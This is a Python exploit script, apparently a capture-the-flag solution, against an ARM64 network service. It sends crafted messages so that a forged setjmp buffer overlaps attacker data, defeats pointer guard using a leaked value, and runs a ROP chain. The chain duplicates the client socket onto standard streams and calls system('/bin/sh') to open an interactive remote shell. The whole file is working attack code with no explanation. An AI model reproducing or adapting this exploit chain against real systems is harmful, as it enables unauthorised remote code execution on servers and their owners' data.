from exploit_base import * # Call system("/bin/sh") def exploit_system(cmd): client_fd = 5 new_stackaddr = exe_base + 0x15590 new_jmpbuf = bytearray(leak) new_jmpbuf[0x80:0x88] = p64(ptr_guard ^ (exe_base + 0x249c)) # in readall new_jmpbuf[0x90:0x98] = p64(ptr_guard ^ new_stackaddr) rop = flat([ 0, exe_base + 0x23b4, # => write, for sanity check new_stackaddr + 0x30, p32(0xaaaaaaaa), p32(client_fd), 0, 0, 0, libc_base + 0x000dda08, # ldp x0, x1, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret; exe_base + 0x1502c, p32(16), p32(client_fd), 0, libc_base + 0xbc8e0, # dup2 0, 0, 5, 0, 0, libc_base + 0x000dda08, # ldp x0, x1, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret; 0, 0, 0, libc_base + 0xbc8e0, # dup2 0, 0, 5, 1, 0, libc_base + 0x000dda08, # ldp x0, x1, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret; 0, 0, 0, libc_base + 0xbc8e0, # dup2 0, 0, 5, 2, 0, libc_base + 0x000dda08, # ldp x0, x1, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret; 0, 0, 0, libc_base + 0x47734, # system 0, 0, exe_base + 0x159e0, 0, ]) rop1 = bytearray(rop[:0x30]) rop2 = rop[0x30:] rop1[0x18:0x1c] = p32(len(rop2)) log.info("sending %d-byte rop", len(rop2)) # fill msgs bad_msg(b"Hello from ROP!\n") for i in range(4): bad_msg(b"a") bad_msg(rop1) for i in range(3): bad_msg(b"a") bad_msg(cmd.encode() + b"\0") # insert extra msg, throw exception on msg size menu("E") menu("A") sendint(999) # insert one more to overlap jmpbuf, throw exception on crc to longjmp bad_msg(new_jmpbuf) s.send(rop2) s.recvuntil(b"Hello from ROP!\n") if __name__ == "__main__": exploit_system("/bin/sh") s.interactive()